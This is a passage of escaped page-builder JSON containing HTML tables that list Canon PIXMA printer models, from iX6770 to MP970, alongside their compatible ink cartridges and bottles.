Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 